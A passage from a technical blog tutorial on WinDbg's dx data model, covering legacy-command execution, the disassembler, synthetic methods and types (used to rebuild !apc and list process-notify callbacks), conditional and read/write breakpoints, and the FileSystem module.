This sounds like a lot. Because it is. So let’s start!

Legacy Commands

This new data model completely changes the debugging experience. But sometimes you do need to use one of the old commands or extensions that we all got used to, and that don’t have a matching functionality under dx.

But we can still use these under dx with Debugger.Utility.Control.ExecuteCommand, which lets us run a legacy command as part of a dx query. For example, we can use the legacy u command to unassemble the address that is pointed to by RIP in our second stack frame.

Since dx output is decimal by default and legacy commands only take hex input we first need to convert it to hex using ToDisplayString("x"):

dx Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))
Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))                
[0x0] : kdnic!TXTransmitQueuedSends+0x125:
[0x1] : fffff807`52ad2b61 4883c430 add rsp,30h
[0x2] : fffff807`52ad2b65 5b pop rbx
[0x3] : fffff807`52ad2b66 c3 ret
[0x4] : fffff807`52ad2b67 4c8d4370 lea r8,[rbx+70h]
[0x5] : fffff807`52ad2b6b 488bd7 mov rdx,rdi
[0x6] : fffff807`52ad2b6e 488d4b60 lea rcx,[rbx+60h]
[0x7] : fffff807`52ad2b72 4c8b15d7350000 mov r10,qword ptr [kdnic!_imp_ExInterlockedInsertTailList (fffff807`52ad6150)]
[0x8] : fffff807`52ad2b79 e8123af8fb call nt!ExInterlockedInsertTailList (fffff807`4ea56590)

Another useful legacy command is !irp. This command supplies us with a lot of information about IRPs, so no need to work hard to recreate it with dx.

So we will try to run !irp for all IRPs in lsass.exe process. Let’s walk through that:

First, we need to find the process container for lsass.exe. We already know how to do that using Where(). Then we’ll pick the first process returned. Usually there should only be one lsass anyway, unless there are server silos on the machine:

dx @$lsass = @$cursession.Processes.Where(p => p.Name == “lsass.exe”).First()

Then we need to iterate over IrpList for each thread in the process and get the IRPs themselves. We can easily do that with FromListEntry() that we’ve seen already. Then we only pick the threads that have IRPs in their list:

dx -r4 @$irpThreads = @$lsass.Threads.Select(t => new {irp = Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
@$irpThreads = @$lsass.Threads.Select(t => new {irp = 
Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
[0x384]
irp
[0x0] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]
[0x1] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]

We can stop here for a moment, click on IoStack for one of the IRPs (or run with -r5 to see all of them) and get the stack in a nice container we can work with:

dx @$irpThreads.First().irp[0].IoStack
@$irpThreads.First().irp[0].IoStack                 : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
[0] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[1] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[2] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[3] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[4] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[5] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[6] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[7] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[8] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[9] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[10] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs" [Type: _IO_STACK_LOCATION]
[11] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\FltMgr" [Type: _IO_STACK_LOCATION]

And as the final step we will iterate over every thread, and over every IRP in them, and ExecuteCommand !irp <irp address>. Here too we need casting and ToDisplayString("x") to match the format expected by legacy commands (the output of !irp is very long so we trimmed it down to focus on the interesting data):

dx -r3 @$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))
@$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))                
[0x384]
[0x0]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5b8f4d40)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5b8f4dd0:
[0x1]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5bd24840)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5bd248d0:

Most of the information given to us by !irp we can get by parsing the IRPs with dx and dumping the IoStack for each. But there are a few things we might have a harder time to get but receive from the legacy command such as the existence and address of an IrpExtension and information about a possible Mdl linked to the Irp.

Disassembler

We used the u command as an example, though in this case there actually is functionality implementing this in dx, through Debugger.Utility.Code.CreateDisassember and DisassembleBlock, creating iterable and searchable disassembly:

dx -r3 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)                
[0xfffff80752ad2b61] : Basic Block [0xfffff80752ad2b61 - 0xfffff80752ad2b67)
StartAddress : 0xfffff80752ad2b61
EndAddress : 0xfffff80752ad2b67
Instructions
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0xfffff80752ad2b67] : Basic Block [0xfffff80752ad2b67 - 0xfffff80752ad2b7e)
StartAddress : 0xfffff80752ad2b67
EndAddress : 0xfffff80752ad2b7e
Instructions
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0xfffff80752ad2b7e] : Basic Block [0xfffff80752ad2b7e - 0xfffff80752ad2b80)
StartAddress : 0xfffff80752ad2b7e
EndAddress : 0xfffff80752ad2b80
Instructions
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0xfffff80752ad2b80] : Basic Block [0xfffff80752ad2b80 - 0xfffff80752ad2b81)
StartAddress : 0xfffff80752ad2b80
EndAddress : 0xfffff80752ad2b81
Instructions
...

And the cleaned-up version, picking only the instructions and flattening the tree:

dx -r2 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()                
[0x0]
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0x1]
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0x2]
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0x3]
[0xfffff80752ad2b80] : int 3
[0x4]
[0xfffff80752ad2b81] : int 3
...

Synthetic Methods

Another functionality that we get with this debugger data model is to create functions of our own and use them, with this syntax:

0: kd> dx @$multiplyByThree = (x => x * 3)
@$multiplyByThree = (x => x * 3)
0: kd> dx @$multiplyByThree(5)
@$multiplyByThree(5) : 15

Or we can have functions taking multiple arguments:

0: kd> dx @$add = ((x, y) => x + y)
@$add = ((x, y) => x + y)
0: kd> dx @$add(5, 7)
@$add(5, 7)      : 12

Or if we want to really go a few levels up, we can apply these functions to the disassembly output we saw earlier to find all writes into memory in ZwSetInformationProcess. For that there are a few checks we need to apply to each instruction to know whether or not it’s a write into memory:

· Does it have at least 2 operands?
For example, ret will have zero and jmp <address> will have one. We only care about cases where one value is being written into some location, which will always require two operands. To verify that we will check for each instruction Operands.Count() > 1.

· Is this a memory reference?
We are only interested in writes into memory and want to ignore instructions like mon r10, rcx. To do that, we will check for each instruction its Operands[0].Attributes.IsMemoryReference == true.
We check Operands[0] because that will be the destination. If we wanted to find memory reads we would have checked the source, which is in Operands[1].

· Is the destination operand an output?
We want to filter out instructions where memory is referenced but not written into. To check that we will use Operands[0].IsOutput == true.

· As our last filter we want to ignore memory writes into the stack, which will look like mov [rsp+0x18], 1 or mov [rbp-0x10], rdx.
We will check the register of the first operand and make sure its index is not the rsp index (0x14) or rbp index (0x15).

We will write a function, @$isMemWrite, that receives a block and only returns the instructions that contain a memory write, based in these checks. Then we can create a disassembler, disassemble our target function and only print the memory writes in it:

dx -r0 @$rspId = 0x14
dx -r0 @$rbpId = 0x15
dx -r0 @$isMemWrite = (b => b.Instructions.Where(i => i.Operands.Count() > 1 && i.Operands[0].Attributes.IsOutput && i.Operands[0].Registers[0].Id != @$rspId && i.Operands[0].Registers[0].Id != @$rbpId && i.Operands[0].Attributes.IsMemoryReference))
dx -r0 @$findMemWrite = (a => Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(a).Select(b => @$isMemWrite(b)))
dx -r2 @$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)
@$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)                
[0xfffff8074ebd23d4]
[0xfffff8074ebd23e9] : mov qword ptr [r10+80h],rax
[0xfffff8074ebd23f5] : mov qword ptr [r10+44h],rax
[0xfffff8074ebd2415]
[0xfffff8074ebd2421] : mov qword ptr [r10+98h],r8
[0xfffff8074ebd2428] : mov qword ptr [r10+0F8h],r9
[0xfffff8074ebd2433] : mov byte ptr gs:[5D18h],al
[0xfffff8074ebd25b2]
[0xfffff8074ebd25c3] : mov qword ptr [rcx],rax
[0xfffff8074ebd25c9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd25d0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd25d7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd25df] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd263f]
[0xfffff8074ebd264f] : and byte ptr [rax+5],0FDh
[0xfffff8074ebd26da]
[0xfffff8074ebd26e3] : mov qword ptr [rcx],rax
[0xfffff8074ebd26e9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd26f0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd26f7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd26ff] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd2708] : mov word ptr [rcx+72h],ax
...

As another project combining almost everything mentioned here, we can try to create a version of !apc using dx. To simplify we will only look for kernel APCs. To do that, we have a few steps:

  • Iterate over all the processes using @$cursession.Processes to find the ones containing threads where KTHREAD.ApcState.KernelApcPending is set to 1.
  • Make a container in the process with only the threads that have pending kernel APCs. Ignore the rest.
  • For each of these threads, iterate over KTHREAD.ApcState.ApcListHead[0] (contains the kernel APCs) and gather interesting information about them. We can do that with the FromListHead() method we’ve seen earlier.
    To make our container as similar as possible to !apc, we will only get KernelRoutine and RundownRoutine, though in your implementation you might find there are other fields that interest you as well.
  • To make the container easier to navigate, collect process name, ID and EPROCESS address, and thread ID and ETHREAD address.
  • In our implementation we implemented a few helper functions:
    @$printLn — runs the legacy command ln with the supplied address, to get information about the symbol
    @$extractBetween — extract a string between two other strings, will be used for getting a substring from the output of @$printLn
    @$printSymbol — Sends an address to @$printLn and extracts the symbol name only using @$extractSymbol
    @$apcsForThread — Finds all kernel APCs for a thread and creates a container with their KernelRoutine and RundownRoutine.

We then got all the processes that have threads with pending kernel APCs and saved it into the @$procWithKernelApcs register, and then in a separate command got the APC information using @$apcsForThread. We also cast the EPPROCESS and ETHREAD pointers to void* so dx doesn’t print the whole structure when we print the final result.

This was our way of solving this problem, but there can be others, and yours doesn’t have to be identical to ours!

The script we came up with is:

dx -r0 @$printLn = (a => Debugger.Utility.Control.ExecuteCommand(“ln “+((__int64)a).ToDisplayString(“x”)))
dx -r0 @$extractBetween = ((x,y,z) => x.Substring(x.IndexOf(y) + y.Length, x.IndexOf(z) — x.IndexOf(y) — y.Length))
dx -r0 @$printSymbol = (a => @$extractBetween(@$printLn(a)[3], “ “, “|”))
dx -r0 @$apcsForThread = (t => new {TID = t.Id, Object = (void*)&t.KernelObject, Apcs = Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&t.KernelObject.Tcb.ApcState.ApcListHead[0], “nt!_KAPC”, “ApcListEntry”).Select(a => new { Kernel = @$printSymbol(a.KernelRoutine), Rundown = @$printSymbol(a.RundownRoutine)})})
dx -r0 @$procWithKernelApc = @$cursession.Processes.Select(p => new {Name = p.Name, PID = p.Id, Object = (void*)&p.KernelObject, ApcThreads = p.Threads.Where(t => t.KernelObject.Tcb.ApcState.KernelApcPending != 0)}).Where(p => p.ApcThreads.Count() != 0)
dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

And it produces the following output:

dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})
@$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})                
[0x15b8]
Name : SearchUI.exe
Length : 0xc
PID : 0x15b8
Object : 0xffffb90a5b1300c0 [Type: void *]
ApcThreads
[0x159c]
TID : 0x159c
Object : 0xffffb90a5b14f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1528]
TID : 0x1528
Object : 0xffffb90a5aa6b080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b4]
TID : 0x16b4
Object : 0xffffb90a59f1e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16a0]
TID : 0x16a0
Object : 0xffffb90a5b141080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b8]
TID : 0x16b8
Object : 0xffffb90a5aab20c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1740]
TID : 0x1740
Object : 0xffffb90a5ab362c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1780]
TID : 0x1780
Object : 0xffffb90a5b468080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1778]
TID : 0x1778
Object : 0xffffb90a5b6f7080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d0]
TID : 0x17d0
Object : 0xffffb90a5b1e8080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d4]
TID : 0x17d4
Object : 0xffffb90a5b32f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17f8]
TID : 0x17f8
Object : 0xffffb90a5b32e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0xb28]
TID : 0xb28
Object : 0xffffb90a5b065600 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1850]
TID : 0x1850
Object : 0xffffb90a5b6a5080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList

Not as pretty as !apc, but still pretty

We can also print it as a table, receive information about the processes and be able to explore the APCs of each process separately:

dx -g @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

But wait, what are all these APCs withnt!EmpCheckErrataList? And why does SearchUI.exe have all of them? What does this process have to do with erratas?

The secret is that there are not actually APCs meant to callnt!EmpCheckErrataList. And no, the symbols are not wrong.

The thing we see here is happening because the compiler is being smart — when it sees a few different functions that have the same code, it makes them all point to the same piece of code, instead of duplicating this code multiple times. You might think that this is not a thing that would happen very often, but lets look at the disassembly for nt!EmpCheckErrataList (the old way this time):

u EmpCheckErrataList
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

This is actually just a stub. It might be a function that has not been implemented yet (probably the case for this one) or a function that is meant to be a stub for a good reason. The function that is the real KernelRoutine/RundownRoutine of these APCs is nt!KiSchedulerApcNop, and is meant to be a stub on purpose, and has been for many years. And we can see it has the same code and points to the same address:

u nt!KiSchedulerApcNop
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

So why do we see so many of these APCs?

When a thread is being suspended, the system creates a semaphore and queues an APC to the thread that will wait on that semaphore. The thread will be waiting until someone asks the resume it, and then the system will free the semaphore and the thread will stop waiting and will resume. The APC itself doesn’t need to do much, but it must have a KernelRoutine and a RundownRoutine, so the system places a stub there. In the symbols this stub receives the name of one of the functions that have this “code”, this time nt!EmpCheckErrataList, but it can be a different one in the next version.

Anyone interested in the suspension mechanism can look at ReactOS. The code for these functions changed a bit since, and the stub function was renamed from KiSuspendNop to KiSchedulerApcNop, but the general design stayed similar.

But I got distracted, this is not what this blog was supposed to be talking about. Let’s get back to WinDbg and synthetic functions:

Synthetic Types

After covering synthetic methods, we can also add our own named types and use them to parse data where the type is not available to us.

For example, let’s try to print the PspCreateProcessNotifyRoutine array, which holds all the registered process notify routines — function that are registered by drivers and will receive a notification whenever a process starts. But this array doesn’t contain pointers to the registered routines. Instead it contains pointers to the non-documented EX_CALLBACK_ROUTINE_BLOCK structure.

So to parse this array, we need to make sure WinDbg knows this type — to do that we use Synthetic Types. We start by creating a header file containing all the types we want to define (I used c:\temp\header.h). In this case it’s just EX_CALLBACK_ROUTINE_BLOCK, that we can find in ReactOS:

typedef struct _EX_CALLBACK_ROUTINE_BLOCK
{
_EX_RUNDOWN_REF RundownProtect;
void* Function;
void* Context;
} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;

Now we can ask WinDbg to load it and add the types to the nt module:

dx Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")
Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")                 : ntkrnlmp.exe(header.h)
ReturnEnumsAsObjects : false
RegisterSyntheticTypeModels : false
Module : ntkrnlmp.exe
Header : header.h
Types

This gives us an object which lets us see all the types added to this module.
Now that we defined the type, we can use it with CreateInstance:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074cbdff50 [Type: void *]
Context : 0x6e496c4102031400 [Type: void *]

It’s important to notice that CreateInstance only takes __int64 inputs so any other type has to be cast. It’s good to know this in advance because the error messages these modules return are not always easy to understand.

Now, if we look at our output, and specifically at Context, something seems weird. And actually if we try to dump Function we will see it doesn’t point to any code:

dq 0xfffff8074cbdff50
fffff807`4cbdff50 ????????`???????? ????????`????????
fffff807`4cbdff60 ????????`???????? ????????`????????
fffff807`4cbdff70 ????????`???????? ????????`????????
fffff807`4cbdff80 ????????`???????? ????????`????????
fffff807`4cbdff90 ????????`???????? ????????`????????

So what happened?
The problem is not our cast to EX_CALLBACK_ROUTINE_BLOCK, but the address we are casting. If we dump the values in PspCreateProcessNotifyRoutine we might see what it is:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)                
[0] : 0xffffb90a530504ef [Type: void * *]
[1] : 0xffffb90a532a512f [Type: void * *]
[2] : 0xffffb90a53da9d5f [Type: void * *]
[3] : 0xffffb90a53da9ccf [Type: void * *]
[4] : 0xffffb90a53e5d15f [Type: void * *]
[5] : 0xffffb90a571469ef [Type: void * *]
[6] : 0xffffb90a5714722f [Type: void * *]
[7] : 0xffffb90a571473df [Type: void * *]
[8] : 0xffffb90a597d989f [Type: void * *]

The lower half-byte in all of these is 0xF, while we know that pointers in x64 machines are always aligned to 8 bytes, and usually to 0x10. This is because I oversimplified it earlier — these are not pointers to EX_CALLBACK_ROUTINE_BLOCK, they are actually EX_CALLBACK structures (another type that is not in the public pdb), containing an EX_RUNDOWN_REF. But to make this example simpler we will treat them as simple pointers that have been ORed with 0xF, since this is good enough for our purposes. If you ever choose to write a driver that will handle PspCreateProcessNotifyRoutine please do not use this hack, look into ReactOS and do things properly. 😊
So to fix our command we just need to align the addresses to 0x10 before casting them. To do that we do:

<address> & 0xFFFFFFFFFFFFFFF0

Or the nicer version:

<address> & ~0xF

Let’s use that in our command:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074ea7f310 [Type: void *]
Context : 0x0 [Type: void *]

This looks better. Let’s check that Function actually points to a function this time:

ln 0xfffff8074ea7f310
Browse module
Set bu breakpoint
(fffff807`4ea7f310)   nt!ViCreateProcessCallback   |  (fffff807`4ea7f330)   nt!RtlStringCbLengthW
Exact matches:
nt!ViCreateProcessCallback (void)

Looks much better! Now we can get define this cast as a synthetic method and get the function addresses for all routines in the array:

dx -r0 @$getCallbackRoutine = (a => Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (__int64)(a & ~0xf)))
dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)                
[0] : 0xfffff8074ea7f310 [Type: void *]
[1] : 0xfffff8074ff97220 [Type: void *]
[2] : 0xfffff80750a41330 [Type: void *]
[3] : 0xfffff8074f8ab420 [Type: void *]
[4] : 0xfffff8075106d9f0 [Type: void *]
[5] : 0xfffff807516dd930 [Type: void *]
[6] : 0xfffff8074ff252c0 [Type: void *]
[7] : 0xfffff807520b6aa0 [Type: void *]
[8] : 0xfffff80753a63cf0 [Type: void *]

But this will be more fun if we could see the symbols instead of the addresses. We already know how to get the symbols by executing the legacy command ln, but this time we will do it with .printf. First we will write a helper function @$getsym which will run the command printf "%y", <address>:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])

Then we will send every function address to this method, to print the symbol:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))                
[0] : nt!ViCreateProcessCallback (fffff807`4ea7f310)
[1] : cng!CngCreateProcessNotifyRoutine (fffff807`4ff97220)
[2] : WdFilter!MpCreateProcessNotifyRoutineEx (fffff807`50a41330)
[3] : ksecdd!KsecCreateProcessNotifyRoutine (fffff807`4f8ab420)
[4] : tcpip!CreateProcessNotifyRoutineEx (fffff807`5106d9f0)
[5] : iorate!IoRateProcessCreateNotify (fffff807`516dd930)
[6] : CI!I_PEProcessNotify (fffff807`4ff252c0)
[7] : dxgkrnl!DxgkProcessNotify (fffff807`520b6aa0)
[8] : peauth+0x43cf0 (fffff807`53a63cf0)

There, much nicer!

Breakpoints

Conditional Breakpoint

Conditional breakpoints are a huge pain-point when debugging. And with the old MASM syntax they’re almost impossible to use. I spent hours trying to get them to work the way I wanted to, but the command turns out to be so awful that I can’t even understand what I was trying to do, not to mention why it doesn’t filter anything or how to fix it.

Well, these days are over. We can now use dx queries for conditional breakpoints with the following syntax: bp /w “dx query" <address>.

For example, let’s say we are trying to debug an issue involving file opens by Wow64 processes. The function NtOpenProcess is called all the time, but we only care about calls done by Wow64 processes, which are not the majority of processes on modern systems. So to avoid helplessly going through 100 debugger breaks until we get lucky or struggle with MASM-style conditional breakpoints, we can do this instead:

bp /w "@$curprocess.KernelObject.WoW64Process != 0" nt!NtOpenProcess

We then let the machine run, and when the breakpoint is hit we can check if it worked:

Breakpoint 3 hit
nt!NtOpenProcess:
fffff807`2e96b7e0 4883ec38 sub rsp,38h
dx @$curprocess.KernelObject.WoW64Process
@$curprocess.KernelObject.WoW64Process                 : 0xffffc10f5163b390 [Type: _EWOW64PROCESS *]
[+0x000] Peb : 0xf88000 [Type: void *]
[+0x008] Machine : 0x14c [Type: unsigned short]
[+0x00c] NtdllType : PsWowX86SystemDll (1) [Type: _SYSTEM_DLL_TYPE]
dx @$curprocess.Name
@$curprocess.Name : IpOverUsbSvc.exe
Length : 0x10

The process that triggered our breakpoint is a WoW64 process!
For anyone who has ever tried using conditional breakpoints with MASM, this is a life-changing addition.

Other Breakpoint Options

There are a few other interesting breakpoint options found under Debugger.Utility.Control:

  • SetBreakpointAtSourceLocation — allowing us to set a breakpoint in a module whose source file is available to us, with this syntax: dx Debugger.Utility.Control.SetBreakpointAtSourceLocation("MyModule!myFile.cpp", “172”)
  • SetBreakpointAtOffset — sets a breakpoint at an offset inside a function — dx Debugger.Utility.Control.SetBreakpointAtOffset("NtOpenFile", 8, “nt")
  • SetBreakpointForReadWriteFile — similar to the legacy ba command but with more readable syntax, this lets us set a breakpoint to issue a debug break whenever anyone reads or writes to an address. It has default configuration of type = Hardware Write and size = 1.
    For example, let’s try to break on every read of Ci!g_CiOptions, a variable whose size is 4 bytes:
dx Debugger.Utility.Control.SetBreakpointForReadWrite(&Ci!g_CiOptions, “Hardware Read”, 0x4)

We let the machine keep running and almost immediately our breakpoint is hit:

0: kd> g
Breakpoint 0 hit
CI!CiValidateImageHeader+0x51b:
fffff807`2f6fcb1b 740c je CI!CiValidateImageHeader+0x529 (fffff807`2f6fcb29)

CI!CiValidateImageHeader read this global variable when validating an image header. In this specific example, we will see reads of this variable very often and writes into it are the more interesting case, as it can show us an attempt to tamper with signature validation.

An interesting thing to notice about these commands in that they don’t just set a breakpoint, they actually return it as an object we can control, which has attributes like IsEnabled, Condition (allowing us to set a condition), PassCount (telling us how many times this breakpoint has been hit) and more.

FileSystem

Under Debugger.Utility we have the FileSystem module, letting us query and control the file system on the host machine (not the machine we are debugging) from within the debugger:

dx -r1 Debugger.Utility.FileSystem
Debugger.Utility.FileSystem
CreateFile       [CreateFile(path, [disposition]) - Creates a file at the specified path and returns a file object.  'disposition' can be one of 'CreateAlways' or 'CreateNew']
CreateTempFile   [CreateTempFile() - Creates a temporary file in the %TEMP% folder and returns a file object]
CreateTextReader [CreateTextReader(file | path, [encoding]) - Creates a text reader over the specified file.  If a path is passed instead of a file, a file is opened at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CreateTextWriter [CreateTextWriter(file | path, [encoding]) - Creates a text writer over the specified file.  If a path is passed instead of a file, a file is created at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CurrentDirectory : C:\WINDOWS\system32
DeleteFile       [DeleteFile(path) - Deletes a file at the specified path]
FileExists       [FileExists(path) - Checks for the existance of a file at the specified path]
